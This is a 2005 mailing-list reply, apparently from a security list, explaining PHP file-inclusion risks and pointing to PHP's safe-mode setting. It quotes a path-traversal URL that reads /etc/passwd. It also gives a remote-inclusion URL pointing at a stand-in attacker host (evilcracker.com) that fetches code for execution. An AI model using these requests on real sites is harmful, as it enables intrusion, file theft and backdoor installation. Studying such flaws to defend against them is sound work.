From: John GALLET (john.gallet@wanadoo.fr)
Date: Mon Mar 14 2005 - 03:06:25 EST
Hi there,
> Therefore, I tried doing a
> www.example.com/static.php?page=../../../../../../etc/passwd
> but I get an error saying that file doesn't exist.
> I user the same source code in my server, and I could retrieve the
> file...what can be happening? I don't think it is under a chroot jail...
What you can or can not read depends on the configuration of php
(include_path vs safe mode for example). Have a look at :
http://fr3.php.net/features.safe-mode
Now the real risk is not so much reading some source code as executing
some other people's code.
www.example.com/static.php?page=http://evilcracker.com/evil_code.txt
has good chances of also getting executed, which opens the path to
install any backdoor, download perl scripts/trojans, etc...
HTH
JG
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:18 EDT